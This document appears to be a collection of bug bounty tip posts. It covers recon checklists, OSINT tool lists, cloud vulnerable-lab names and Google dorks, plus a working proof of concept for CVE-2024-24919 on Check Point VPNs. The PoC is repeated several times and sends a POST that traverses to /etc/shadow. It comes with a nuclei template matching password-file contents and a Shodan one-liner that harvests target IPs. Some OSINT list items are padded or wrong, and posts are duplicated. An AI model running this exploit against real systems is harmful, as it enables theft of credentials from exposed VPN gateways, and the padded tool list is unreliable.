Bug bounty Tips

Subject Alternate Name (SAN) # Subject Alternative Name (SAN) is an extension to X.509 that allows additional values to be associated with an SSL certificate. These values, or Names, include email addresses, URIs, DNS names, directory names, and more. OpenSSL true | openssl s_client -connect example.com:443 2>/dev/null | openssl x509 -noout -text | perl -l -0777 -ne '@names=/\bDNS:([^\s,]+)/g; print join("\n", sort @names);' Parameters s_client: SSL/TLS client program. x509: output a x590 structure instead of a certificate request. -noout: Inhibits the output of the encoded version of the parameters. -text: Prints out the EC parameters in human readable form.

Slow and steady wins the world 800people 😍❤️

Starting on a new target #bugbounty #bugbountytips First off all, is portscan in scope? If yes, portscan Look for webservers Try to find subdomains Try to find other webservers on said server Try to do content discovery Try to do dorking on found from before Try to find anything on github related Try to take screenshots with something like aquatone Try to look at any kind of custom login pages, try content discovery more Try to look for any register on site and IDOR Try to look for XSS by having '"><img src=x>${{7*2}} at the very least in every field where possible Try to look for SQLi with same and looking out of SQL errors You can use these to fuzz the fu--ers Try to check all CSRF tokens on forms where they need be or generally set and verify it is checked Change GET to POST and reverse or try PUT or DELETE on endpoint NoSQLi? XXE? Any open redirects? Throw some LFI and RFI in the mix! And the best of all? Business logic! Found an API?! YES! LETS GO!! Stay tuned for my API hacking post and let me know what I missed <3

30 Tips how to use OSINT for bug hunting: 1. Use Google Dorks to find vulnerabilities in web applications. 2. Use Shodan to find vulnerable IoT devices. 3. Use Whois to find information about domain names. 4. Use Maltego to visualize relationships between entities. 5. Use the Wayback Machine to find old versions of websites. 6. Use social media to gather information about targets. 7. Use LinkedIn to gather information about employees. 8. Use GitHub to find sensitive information in code repositories. 9. Use Google Alerts to monitor for mentions of your target. 10. Use DNSDumpster to map out a target's infrastructure. 11. Use Recon-ng to automate OSINT tasks. 12. Use theHarvester to gather email addresses and other information. 13. Use SpiderFoot to automate OSINT tasks and gather intelligence. 14. Use FOCA (Fingerprinting Organizations with Collected Archives) to gather metadata from documents. 15. Use VirusTotal to scan files for malware. 16. Use Censys to find vulnerable systems on the internet. 17. Use Foca Pro to extract metadata from documents and analyze it. 18. Use FOCA Online to extract metadata from documents and analyze it in the cloud. 19. Use FOCA Free Edition for basic metadata extraction from documents. 20. Use Metagoofil to extract metadata from documents and analyze it. 21. Use Datasploit for automated OSINT tasks and data mining. 22. Use Google Hacking Database (GHDB) for advanced Google searches. 23. Use Google Custom Search Engine (CSE) for targeted searches on specific websites or domains. 24. Use Google Advanced Search for advanced searches on Google. 25. Use Google Trends to monitor trends related to your target or industry. 26. Use Google Analytics to gather information about website traffic and user behavior. 27. Use Google AdWords Keyword Planner for keyword research related to your target or industry. 28. Use Google PageSpeed Insights to analyze website performance and identify vulnerabilities. 29. Use Google Search Console (formerly Webmaster Tools) for website analytics and vulnerability identification. 30. Use Google My Business for local SEO optimization.

🌩 Pentest in the clouds❤️ • Clouds are a great tool to create a convenient infrastructure for applications and services. Companies and independent developers move their projects to AWS or Azure, often without thinking about security. But in vain. • I will share with you some resources (known vulnerable laboratories) that will help pentesters, specialists or enthusiasts, gain practical experience in searching for vulnerabilities in cloud applications deployed on Google Cloud, AWS or Azure. Resources contain practical and theoretical material: • FLAWS; • FLAWS2; • CONVEX; • Sadcloud; • GCP Goat; • Lambhack; • caponeme; • CloudGoat; • Thunder CTF; • CloudFoxable; • IAM Vulnerable; • AWS Detonation Lab; • OWASP WrongSecrets; • OWASP ServerlessGoat; • AWS S3 CTF Challenges; • The Big IAM Challenge by Wiz; • AWS Well Architected Security Labs; • Damn Vulnerable Cloud Application; • CdkGoat - Vulnerable AWS CDK Infrastructure; • Cfngoat - Vulnerable Cloudformation Template; • TerraGoat - Vulnerable Terraform Infrastructure; • AWSGoat - A Damn Vulnerable AWS Infrastructure; • AzureGoat - A Damn Vulnerable Azure Infrastructure; • Breaking and Pwning Apps and Servers on AWS and Azure. Posted by @TheGodEye

🔎 Uncovering the Hidden Gems: 40 Google Dorks for Bug Bounty Programs site:example.com inurl:bug inurl:bounty site:example.com inurl:security intext:bounty site:example.com inurl:security ext:txt site:example.com inurl:responsible-disclosure site:example.com inurl:/.well-known/security site:example.com intext:bug bounty program site:example.com intext:responsible disclosure program site:example.com intext:vulnerability disclosure program site:example.com intext:security rewards site:example.com intext:bug bounty payout site:example.com inurl:security ext:txt -inurl:hackerone -inurl:bugcrowd -inurl:synack site:example.com inurl:responsible-disclosure -inurl:hackerone -inurl:bugcrowd -inurl:synack site:example.com intext:bug bounty -inurl:hackerone -inurl:bugcrowd -inurl:synack inurl:/security inurl:/responsible-disclosure/ swag inurl:’/responsible disclosure’ hoodie responsible disclosure hall of fame inurl:responsible disclosure $50 responsible disclosure europe responsible disclosure white hat white hat program responsible disclosure r=h:nl responsible disclosure r=h:uk responsible disclosure r=h:eu responsible disclosure bounty r=h:nl responsible disclosure bounty r=h:uk responsible disclosure bounty r=h:eu responsible disclosure swag r=h:nl responsible disclosure swag r=h:uk responsible disclosure swag r=h:eu responsible disclosure reward r=h:nl responsible disclosure reward r=h:uk responsible disclosure reward r=h:eu “powered by bugcrowd” -site:bugcrowd.com “submit vulnerability report” “submit vulnerability report” | “powered by bugcrowd” | “powered by hackerone” intext:”we take security very seriously” site:responsibledisclosure.com inurl:’vulnerability-disclosure-policy’ reward site:..nl intext: security report reward

give reactions guys please

Stored xss: small mind map

For this vulnerability, just type shodan title:"Check Point" ssl:"target" CVE-2024-24919 POST /clients/MyCRL HTTP/1.1 host: target Content-Length: 39 aCSHELL/../../../../../../../etc/shadow #SSLVPN #BugBounty

CVE-2024-24919 * Check Point Remote Access VPN 0-Day * FOFA link * POC: POST /clients/MyCRL HTTP/1.1 Host: <redacted> Content-Length: 39 aCSHELL/../../../../../../../etc/shadow #0day #checkpoint

CVE-2024-24919 * Check Point Remote Access VPN 0-Day * FOFA link * POC: POST /clients/MyCRL HTTP/1.1 Host: <redacted> Content-Length: 39 aCSHELL/../../../../../../../etc/shadow #0day #checkpoint

Check Point - Wrong Check Point (CVE-2024-24919) Grabbed the ipaddress using shodan and then put it to nuclei code below id: CVE-2024-24919 info: name: WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion author: Addy severity: High metadata: max-request: 1 vendor: checkpoint tags: cve,cve2024,checkpoint http: - method: POST path: - "{{BaseURL}}/clients/MyCRL" body: 'aCSHELL/../../../../../../../etc/shadow' matchers-condition: and matchers: - type: regex part: body regex: - "root:" - "cpep_user:" - type: status status: - 200 https://t.co/YcKOC3DqZL Follow t.me/bugbounty_tech

Check Point - Wrong Check Point (CVE-2024-24919) Grabbed the ipaddress using shodan and then put it to nuclei code below id: CVE-2024-24919 info: name: WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion author: Addy severity: High metadata: max-request: 1 vendor: checkpoint tags: cve,cve2024,checkpoint http: - method: POST path: - "{{BaseURL}}/clients/MyCRL" body: 'aCSHELL/../../../../../../../etc/shadow' matchers-condition: and matchers: - type: regex part: body regex: - "root:" - "cpep_user:" - type: status status: - 200 https://t.co/YcKOC3DqZL Follow t.me/bugbounty_tech

Oneliner for Grabbing ip from Shodan shodan search --fields ip_str,port 'http.title:"Check Point SSL Network Extender"' --separator ":" | sed 's/.$//' > file.txt